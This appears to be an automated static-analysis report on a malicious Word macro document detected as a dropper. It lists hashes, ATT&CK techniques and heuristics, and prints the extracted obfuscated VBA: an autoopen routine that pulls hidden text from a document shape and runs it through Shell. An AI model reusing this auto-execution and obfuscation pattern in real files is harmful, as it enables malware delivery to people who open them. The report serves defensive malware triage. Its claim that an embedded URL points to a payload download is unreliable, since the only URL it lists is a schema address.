Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d48f2cb5cc595f5c…

MALICIOUS

Office (OLE)

Size: 89.9 KB
Created: 2018-12-11 08:52:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: bf493d9ce62dc9b228ab6f2b3fd677ee
SHA-1: aa2e74908d0a1392dd59f111e2dd4f2c4631491a
SHA-256: d48f2cb5cc595f5cea29b7fd2bd8463fdfaf980c48792294ebb4c798516a7eae
Risk Score: 292

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File

The sample contains VBA macros with an autoopen function that triggers a Shell() call. This call executes cmd.exe with arguments that appear to construct and execute a PowerShell command. The PowerShell command is obfuscated but likely responsible for downloading and executing a second-stage payload from a remote location, as indicated by the embedded URL and the ClamAV detection name 'Doc.Dropper.Agent'.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6830924-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6830924-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
     _
    .Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq)
       jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub autoopen()
    bnqnq
  • Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell (high, SC_STR_POWERSHELL)
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5183 bytes
SHA-256: 5385865d12234347b8a5da60c5bbaa16d67d0befb1fa89bea3e7cebf058fc5dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
153 of 182 identifiers look randomly generated (e.g. 'LJQujEFAUdFBllzoinJfBfQP'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "RStCinJwZM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
bnqnq
End Sub

Attribute VB_Name = "fltlWwRJVIiFIr"
Function bnqnq()
On Error Resume Next
   zjiinYLhwllDjGA = (181432626 + Round(uCLdacmOGqMTXwsbuvDfuRv) * 23104012 - IDJjLfbwhnwbbZE + (QjhzNZotcmLzwwcGIXRYcfuL / Tan(VqJuzSWwjdlNEsjOQGZUi)))
iKrTEHfTllWNsj = 207388330
   UdmFiAitGiMBNaaSIuGBdZs = (55016008 + Round(dZNRYRpjIZQziHzidqIi) * 234516082 - WkAEszpQvkiYAaQciRXRF + (KSamITAikazvCc / Tan(TYqtrifVJGXRAIqKR)))
WahiFqWQNzEbFYoLPsjY = 93629754
   NQiGZbjvwGZfzcs = (7951182 + Round(fhattQLaitfEPoow) * 47256574 - jNjaYCWhwFArlazDusuO + (zSjviAqjRliqzJocEJ / Tan(WMSGamHFHMuwBsKjuDf)))
BfBjURBnRJapjWrHhMFIbv = 232481328
   aPPllqhmuXYDwZUAwSITL = (1117982 + Round(JVzFAopzbALOMOK) * 65207245 - MwsjaOcfXmclUUaaHGQnkhz + (ZzCnKIlmIQHOHbi / Tan(UZcBNMHfkoEIuWH)))
wmGdLpUPAqcDNLSfYJSL = 29370576
   GkhoBpLDmYsUvJjdipWSkB = (200278905 + Round(idDhKdBLsjUHJKc) * 41656692 - ZiDubhpRCEcQpDEFbKXmis + (WjcOoYTTMQdKSaKD / Tan(NQIYZvCdQBhAFTKjZjOzSBsi)))
QALsmfQGaYOklzlZlYXmT = 44785202
   zHljVJvqRMpMFB = (49424667 + Round(WwohoBCdHdaZvT) * 105533493 - YwPRuPkFqOcNdWc + (BrNnkUQwEIcsjWvzwknGl / Tan(GGMjrZYpzkBpXEGcUDiRNm)))
sWUTfQsiVzLkGbAdqaOIrr = 299404949
   qiBtAVacBWhEKSizjCdWzr = (329437765 + Round(llvqhjGlqunrfiUaqh) * 12319430 - hoaBYzbohbowkjIPZj + (SQwOPfmSBhCjSpbozKuSiHR / Tan(PGoHwaEBGnjGlZ)))
WljaHiuWIIrLFfRL = 68580705
   RiZLfMMcjkDjLJzwtaphfw = (340555788 + Round(cKSauNFSvUcvbTaAnCvkmWc) * 203923518 - GOJUwITfjjVumhSflkrhCXa + (pudCPGGhnjozww / Tan(LJQujEFAUdFBllzoinJfBfQP)))
coHDtSinkfYldqvjtIY = 67547064
   IIkiRcBzjWMaCGQuibG = (160785397 + Round(SvjjozfzHHFAwFzLwrCiF) * 111492714 - CaNJiGRTUYppNBwdiW + (cPGaDATifjDpbBZhJaowspnl / Tan(JQkKzOYMHoFvAKIPXmj)))
iNnnUpCpZEncVzuki = 163169574
Set wpuGLn = RStCinJwZM.Shapes(FZCEz + "TnCpdnC" + vIWsFV)
   MqJbIDwnaqlKKHmDEDjX = (258433863 + Round(SlRGoqjIUScNQABn) * 211775080 - wCqBOaIwqGuXGFtBYY + (BOGERVThzqlBQXMa / Tan(UQWrzqzcNwLWTPcddiGqw)))
futLIEEiAufIjHBSDYG = 180807017
   CPlsVwzofpLjGH = (49301192 + Round(JMwGjWaGzqPiVVdULWcZDLF) * 320486877 - SObjidAEwVFfhSfoi + (fhSSKLqYjiiowHBpQIzXUNO / Tan(YAYpdEzkZRZPzADPtGt)))
VIWzisBXpGYSTsuKnB = 309195651
Set zjsATH = wpuGLn.TextFrame
   RqKCTbsSStnwbSXzQb = (196643864 + Round(PEBzssqbwozwCqIsZTBftP) * 95727281 - IjPoSvFJsjFMoLKblQVivo + (lJfZwawvzqNqIcBJBjoFSkw / Tan(OJZtdtksTqiinV)))
jtnFWbUCwkHUuGi = 175535712
Set zzbKWN = zjsATH.ContainingRange
   lnUCWvWnzRjZwzjQ = (237812479 + Round(CVGKWEVXKiJWwWbwjmUjOU) * 46309413 - LroJrXUAVLhiFaQQjzkr + (dVJwANtvAXiOdzfPMjmK / Tan(AkpwqJVEDPjPwhV)))
LrJaFUnzQcblATSzhVcl = 134468745
zVsVoHBaFPJ = zzbKWN + RJkBock + YqzIw + zqjOhjE + lhdFkKJh + OXiAR + OMNRBMY + zniVvW + bQSdU + HXipISpP
   BhABizJfIwUKdbivQpJw = (152854576 + Round(JJzYEdwhZhFYhdcKLG) * 63439508 - nblSAhYOizZfGjXrEKsfh + (WmFEtBSFdDonhiXfXWF / Tan(wcHZRBFlGANdCMEwMvnWw)))
TVqTzpTYmVazbtffnswj = 333470739
   nPaGdhbYdJUnUaHibwJ = (135911943 + Round(NIwYwKldWdNlcpjFW) * 210999175 - zrSOhtATmEYRzRLaHchjW + (vHjGCslYYFQaXXvtRiwqzZ / Tan(LOTQPbcozMGwKiarHiNfSAYu)))
fOKCjfrWJUsjbWwwQROQbk = 72541879
   OzHjjTFlUoHXpSGDP = (144285357 + Round(YbDELtiaZkSDvBN) * 184509727 - XBvroVpwjnQRntZVappK + (wnFsfACkMVbqafOaNkFOFbG / Tan(JmrshUMYRlbOqzIU)))
NXSoaNOKvMFkwpUjsjtJKC = 287405869
   zzCPVZEzpvSVlTar = (230266769 + Round(jfiLYpSGtbwZBIs) * 90803318 - WmqIZcAHwiLDkBBTMFqjoa + (zOjdBPtJcXfEFszK / Tan(dDaLGDIZuGpDCi)))
vZstswzsEUjfFw = 317017477
   PEswTlwMZzjYin = (219674807 + Round(SXaJdoAwqoiOtfzuwIVwjNqa) * 2038329 - aVQrOjTWOFqZXbDtG + (HjTtzmcVSkSEjAJNOfiw / Tan(wvWQuEWlttnHLSQwjVi)))
sNjDKYpQJMYLIFIoz = 192977168
Const qZhSoLXwd = 0
   NriKqCzWAjCNbYLcCa = (208053513 + Round(RvtDOhIMNiAlawvRYp) * 239185355 - lrTfmIKDsYCSNnDSw + (vJtkIVfRnfctENqQlab / Tan(QGWFUpciXntdTzta)))
AiwzVVfbwUobzCdqlK = 272920417
   ZqwbWaEBAJZkOPKDVNwl = (258940347 + Round(KzplYtVtdwXNRwj) * 299510518 - zzkEffwWSscCjGis + (fzmlBLjGjbNAzMTcD / Tan(oCCiTqOFAtruroUzSmGYvmEz)))
ElVUjIafHuqOAdwWwKmPljZj = 332190777
   XPEwJvzEqSPVLsTR = (187951437 + Round(BbXLTQwCwGVvXTdZ) * 70099477 - zqXnQBLIFXQfuBjqPK + (MwnAHwtivvvsmhwRmpNLWz / Tan(LYmQMTLhETjwbMqP)))
XSQNJfdwzkzBBwTNlcbVhj = 102750014
   aiNOSjVhpDnwfWjfRwBCzj = (248338509 + Round(EmENEZKzGAIjjsXWLScDm) * 106792427 - IUwLLOcrrwfKjbHcPtoriNAw + (afqiHivnpwsHNzkiJRj / Tan(hruDpMKwYSuTwn)))
jlMjOjWrfPVCtDNVvRwqi = 241887088
   ZYXcdWjTAJrWDwQ = (152651612 + Round(QfvIZYwUvtTGhiCHV) * 166907946 - mAWjfbJzzVTOlkIczSwA + (bHhdQNSapOiYkk / Tan(uwPjQZzzbihVZFCpW)))
fLsoCOOqYHGlpBAshAC = 117905583
uYzPWBYJ = Array(OBswhVS, AOoUKQ, KzzCCwCww, Interaction _
 _
 _
 _
 _
 _
 _
 _
.Shell(zVsVoHBaFPJ, qZhSoLXwd), oqmHUiq)
   jCucUFwTwawURwcBlANBW = (64603473 + Round(AQPjOsatYovwAmIdC) * 252979340 - tOaQpZnSrzoDMZntL + (VibYjafVBcPcWKO / Tan(PzazZKbZiujljXM)))
zYhEpViAkTXLCOddoGJnTLf = 73034815
End Function